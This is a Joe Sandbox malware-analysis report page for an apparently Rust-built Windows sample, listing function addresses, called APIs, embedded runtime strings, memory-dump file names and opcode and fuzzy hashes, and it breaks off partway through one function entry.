Function 00298820 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadDescription.KERNELBASE ref: 0029886A

Part of subcall function 002AC630: TlsGetValue.KERNEL32 ref: 002AC64F
Part of subcall function 002AC630: TlsGetValue.KERNEL32 ref: 002AC683
Part of subcall function 002AC630: TlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,002AC741), ref: 002AC693

Part of subcall function 002AC560: TlsGetValue.KERNEL32 ref: 002AC582
Part of subcall function 002AC560: TlsGetValue.KERNEL32 ref: 002AC5D2
Part of subcall function 002AC560: TlsSetValue.KERNEL32(?,?,00000000,?,002AC741), ref: 002AC5E2

Strings

main, xrefs: 00298860

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: Value$DescriptionThread
String ID: main
API String ID: 1014837369-3207122276
Opcode ID: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
Instruction ID: 0ef227204edea0ef4b68e802ea556b688db6f7d62ab6031591296cc1a66f6134
Opcode Fuzzy Hash: c1d8d602db548a8f4d35c744c6b2dddfc4c48d2672d91014ae1290c153ee3b8f
Instruction Fuzzy Hash: BC515832A20B54DAEB11EFA0E8443ED3374FB55308F94442AEA4D57B55EF38C96AC741

Function 002A1956 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 002A1977
memset.MSVCRT ref: 002A1A3F
TlsGetValue.KERNEL32 ref: 002A1AB4
TlsSetValue.KERNEL32 ref: 002A1AC1

Strings

h-, xrefs: 002A1B4A

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: Value$memset
String ID: h-
API String ID: 3732838118-1003138898
Opcode ID: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
Instruction ID: a9e8114a03e4db3cc6367af32220c85e0fd5bc94559dea06e2e9250b2ab75a18
Opcode Fuzzy Hash: 754314cf32835ceba5bf4eb6b678b62dcf53cc62122da42959d73bae2541ae03
Instruction Fuzzy Hash: 5151D032614FC492E7198F28E6403E9B3A0FB99798F148211EF8817725EF38DAB5C740

Function 002ABAA0 Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32 ref: 002ABB34
WriteConsoleW.KERNEL32 ref: 002ABB73
WriteConsoleW.KERNEL32 ref: 002ABBDA
GetLastError.KERNEL32 ref: 002ABBE3
GetLastError.KERNEL32 ref: 002ABC4E

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ConsoleErrorLastWrite$ByteCharMultiWide
String ID:
API String ID: 1956605914-0
Opcode ID: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
Instruction ID: fa2bf5305fc2d3676a0c54f9e98b4be441ecdb875634efda10c823386c55e831
Opcode Fuzzy Hash: 84192aeb223bf039493d913838b751b5b078c80bf8458050e23cca5f8a524f14
Instruction Fuzzy Hash: 553135617206A14BE7364B21D844BEEA612F7167E4F004232EE8947BDEEF7CC565C700

Function 002CF130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 002CF28F

Strings

lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs, xrefs: 002CF323
stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer, xrefs: 002CF14A

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: AddressSingleWake
String ID: lock count overflow in reentrant mutexlibrary\std\src\sync\reentrant_lock.rs$stdoutlibrary\std\src\io\mod.rsfailed to write whole buffer
API String ID: 3114109732-4016646221
Opcode ID: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
Instruction ID: 476d62fd073e8bca6ea2974c7bef918bb5d47dace1a1ca4772f22761e7ae2064
Opcode Fuzzy Hash: 673844cf1efdddbcaa794146a7d21ef0155e645c6ad0a49ece3fa00b3c115906
Instruction Fuzzy Hash: 9651EF32721B9089EB40DF60E9887AC33B6F705398F94862ADE0D57B54DF78C5AAC341

Function 002CEC40 Relevance: 2.7, APIs: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 002CECF9
memcpy.MSVCRT ref: 002CEEAC

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
Instruction ID: 858a3d13556d15a11bb57f50d5019d26af9afadfe5b18e8dafb0337dc484cb52
Opcode Fuzzy Hash: 45cb6a88c03ae7bc8c3add63fc1c85d6650b63103496521e23a78d9f36850919
Instruction Fuzzy Hash: 8C613462731A9082DE20DF2299047AD7760FB19BE4F858B2ADE5E07B84DB3CC1A5C300

Function 002AC2E0 Relevance: 1.4, APIs: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
Instruction ID: 4408b0649c0c370db86ff415a4148830880e2090c4f456bd7406509ae6ae590e
Opcode Fuzzy Hash: 6f6dc09aa7c662e024324c2309773761124c712cafbe4db4a15ffbb12c23a858
Instruction Fuzzy Hash: 07317D62330A4483DE29DF26AA1937AA761FB4ABD4F7488129E1E4BB54CF3CC465C344

Function 002AC40D Relevance: 1.3, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 002AC491

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
Instruction ID: 0873045b459f44b1f802b6578abc7cab20c9e1106ca8d6c9361e36ddaf6a8a2e
Opcode Fuzzy Hash: c3a6c91664c1b522c37d69ebb7d00f1455ea75abf349b2411abfd2870fff3425
Instruction Fuzzy Hash: 0E110C6332175443CD258B2ABA1933AAA55AB16BF8F1449218F6E07FD5CF7CC5958204

Function 002CDBB0 Relevance: 1.3, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32 ref: 002CDC40

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 736218cf31fc61fe350372b287f9dcccf93c11a5578c81c3f0a6b2c487d84f8a
Instruction ID: 9f7eec3a593a5ebc69a6bf844b0238977ec5cce8bf906b671ed5256deddc583b
Opcode Fuzzy Hash: 736218cf31fc61fe350372b287f9dcccf93c11a5578c81c3f0a6b2c487d84f8a
Instruction Fuzzy Hash: 2211E922B30A6188EF10DA72CD017AD23706794BC8F28453BDE1D57F49DE64C562C300

Function 00293444 Relevance: 1.3, APIs: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00293472

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: d59b927fb2d67b440293602fe0be4ab1e3a279f54766e1be61f706ee28430068
Instruction ID: 0fc9ecd81bc5794fc1af6e56494ae064d800b421aa98cebac39ea0d12b119600
Opcode Fuzzy Hash: d59b927fb2d67b440293602fe0be4ab1e3a279f54766e1be61f706ee28430068
Instruction Fuzzy Hash: D4E02292720694939C08CF2B9E4004C5B25BB1AFD425488229F0C6BF11CF78C9F39300

Non-executed Functions

Function 002B02C0 Relevance: 42.9, APIs: 21, Strings: 2, Instructions: 2686COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 002B1D73

Strings

.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 002B3A9E
.debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesUtf8Errorvalid_up_toerror_lenNoneSome, xrefs: 002B1280

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: memcpy
String ID: .debug_abbrev.debug_addr.debug_aranges.debug_cu_index.debug_info.debug_line.debug_line_str.debug_loc.debug_loclists.debug_ranges.debug_rnglists.debug_str.debug_str_offsets.debug_tu_index.debug_typesUtf8Errorvalid_up_toerror_lenNoneSome$.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwolibrary\std\src\..\..\backtrace\src\symbolize\gimli.rs
API String ID: 3510742995-2604783721
Opcode ID: 6fc48e3d850d740e02283ce2d2516cca550cd13bca25e77061d9554d9f7e8299
Instruction ID: c330bf05e5b6aade0cf1120439dc32efe6566f607b7688e4045b9dcc816f9766
Opcode Fuzzy Hash: 6fc48e3d850d740e02283ce2d2516cca550cd13bca25e77061d9554d9f7e8299
Instruction Fuzzy Hash: BF535632625BC4C8EB71DF29D890BE933A4F75978CF548216CA8D4BB59DF3486A9C340

Function 002CF500 Relevance: 37.5, APIs: 19, Strings: 2, Instructions: 737processCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 002CF5F9
GetCurrentDirectoryW.KERNEL32 ref: 002CF604
GetLastError.KERNEL32 ref: 002CF610
GetLastError.KERNEL32 ref: 002CF629
GetLastError.KERNEL32 ref: 002CF6D3
memset.MSVCRT ref: 002CF81A
RtlCaptureContext.KERNEL32(?), ref: 002CF822
RtlLookupFunctionEntry.KERNEL32(?), ref: 002CF846
CreateToolhelp32Snapshot.KERNEL32 ref: 002CF9F0
memset.MSVCRT ref: 002CFA0D

Strings

stack backtrace:, xrefs: 002CF789
note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 002CFFC6

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLast$memset$CaptureContextCreateCurrentDirectoryEntryFunctionLookupSnapshotToolhelp32
String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
API String ID: 3426570729-3192684347
Opcode ID: 5c8e0c5459c1994d2554813a24706ff4f6be2ec6c6413b7801bf94b9463f1c6e
Instruction ID: 247107b3e599cc84f41a8e718fab0bb8b2f3762598558ef3df21d1e6f49448b6
Opcode Fuzzy Hash: 5c8e0c5459c1994d2554813a24706ff4f6be2ec6c6413b7801bf94b9463f1c6e
Instruction Fuzzy Hash: 68729D22221BC089EB70CF25D8447ED3761F74A798F54422ADE4E4BB99DF78C6A5C341

Function 002AD4B0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 337windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 002AD4ED
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,002AD11C), ref: 002AD54C
memcpy.MSVCRT ref: 002AD5CA

Strings

H., xrefs: 002ADA3F
assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs, xrefs: 002ADA0C
NTDLL.DLL, xrefs: 002AD4FF

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: FormatMessagememcpymemset
String ID: H.$NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/64ebd39da5ec28caa3bd7cbb3f22f5949432fe2b\library\alloc\src\string.rs
API String ID: 2872659494-56576336
Opcode ID: 12bc28631c0c6eeaf82aea8d74ce974a5b8dd624ab7898788b5f17c1153bc69d
Instruction ID: 07f944f5bb4c68f601fd1f53cbcc82befa7536eed6f21b985c8d3266557c59a8
Opcode Fuzzy Hash: 12bc28631c0c6eeaf82aea8d74ce974a5b8dd624ab7898788b5f17c1153bc69d
Instruction Fuzzy Hash: 60D10436225AC28AEB318F24D9047FE3B61F706788F444136DA5A0BF99DF78C666D340

Function 002D2E10 Relevance: 12.0, APIs: 8, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 002D2E24
RtlLookupFunctionEntry.KERNEL32 ref: 002D2E3B
RtlVirtualUnwind.KERNEL32 ref: 002D2E7D
SetUnhandledExceptionFilter.KERNEL32 ref: 002D2EC1
UnhandledExceptionFilter.KERNEL32 ref: 002D2ECE
GetCurrentProcess.KERNEL32 ref: 002D2ED4
TerminateProcess.KERNEL32 ref: 002D2EE2
abort.MSVCRT ref: 002D2EE8

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID:
API String ID: 4278921479-0
Opcode ID: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
Instruction ID: 591a1f4d417e70b8b4798c984f2d941e8111fbd7892fdf838110b6a899fbfc53
Opcode Fuzzy Hash: 29e65a1842ae0c480ea10587979510cacfd26ebae216b08e15be02510e6e64d0
Instruction Fuzzy Hash: 5F211375691F85D9EB008B66F88838933B8F749B84F90062ADE8E57724EF38C599C750

Function 002D2D30 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 002D2D75
GetCurrentProcessId.KERNEL32 ref: 002D2D80
GetCurrentThreadId.KERNEL32 ref: 002D2D88
GetTickCount.KERNEL32 ref: 002D2D90
QueryPerformanceCounter.KERNEL32 ref: 002D2D9E

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
Instruction ID: 60cb6538926edd8d2ce75c5e4e767361a7d9711f56ecdc9a7ce12f72150df421
Opcode Fuzzy Hash: 717ecaf089a558b5f8164dbedcdfa976f3d2edc265b87dce1c386dab7944ac34
Instruction Fuzzy Hash: 7411A026765B5182FF208B25F80831573A4B759BB1F4806319E9C037A4EA7CD989C300

Function 002B9E60 Relevance: 5.2, APIs: 4, Instructions: 225COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 002B9F25
memcpy.MSVCRT ref: 002B9F8B
memcpy.MSVCRT ref: 002B9FE6
memcpy.MSVCRT ref: 002BA04A

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7c28e3635209d5d210ca6808aeb4c7ca7d276faae547e995a7c688cf08b20bab
Instruction ID: b3f67c755759941cd8b90578187dd2ba4784ff539323f73f8b03d721eaa62d6a
Opcode Fuzzy Hash: 7c28e3635209d5d210ca6808aeb4c7ca7d276faae547e995a7c688cf08b20bab
Instruction Fuzzy Hash: B5918862725B909ADB48CF66E8043AD77A4F709B88F48852AEF9D97B45DF34D4B0C301

Function 002A9790 Relevance: 4.6, Strings: 3, Instructions: 802COMMON

Download Yara Rule

Strings

,(><&*@, xrefs: 002A9EF2
::_$, xrefs: 002A9AF3, 002A9DB9
called `Result::unwrap()` on an `Err` value, xrefs: 002AA305

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721146338.00000000002E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721274798.00000000002EA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721313837.00000000002EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1721339893.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_290000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ,(><&*@$::_$$called `Result::unwrap()` on an `Err` value
API String ID: 0-2516785824
Opcode ID: 5a4507723b2e77f80899ef8ac2e34b233ab0ff2a1e48ea12d33f9ae7da03ed31
Instruction ID: a7befb30761c59d6da793aa1db12c1b32ec9f1d546308155639128578fb4b952
Opcode Fuzzy Hash: 5a4507723b2e77f80899ef8ac2e34b233ab0ff2a1e48ea12d33f9ae7da03ed31
Instruction Fuzzy Hash: 0B528322738A9147DF358F26D848BA92B15F747798F888212EE5E4B790DF79C9E1C301

Function 002C78A0 Relevance: 4.5, APIs: 3, Instructions: 736COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721068936.0000000000291000.00000020.00000001.01000000.00000003.sdmp, Offset: 00290000, based on PE: true

Associated: 00000000.00000002.1721043502.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
